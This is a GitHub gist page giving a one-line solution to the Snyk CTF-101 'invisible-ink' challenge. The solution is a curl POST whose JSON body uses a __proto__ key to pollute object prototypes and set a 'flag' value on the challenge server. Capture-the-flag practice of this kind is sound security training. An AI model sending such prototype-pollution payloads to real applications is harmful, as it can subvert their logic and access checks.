Skip to content

Instantly share code, notes, and snippets.

@jv199768
Forked from pythoninthegrass/solution.sh
Created May 31, 2024 11:08
Show Gist options
  • Save jv199768/943fcd7e6bbbdd3fd843d611dbaaef3c to your computer and use it in GitHub Desktop.
Save jv199768/943fcd7e6bbbdd3fd843d611dbaaef3c to your computer and use it in GitHub Desktop.
Snyk CTF-101: invisible-ink
# invisible-ink
curl -H "Content-Type: application/json" -X POST -d '{"about": {"__proto__": {"flag": "true"}}}' http://invisible-ink.c.ctf-snyk.io/echo
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment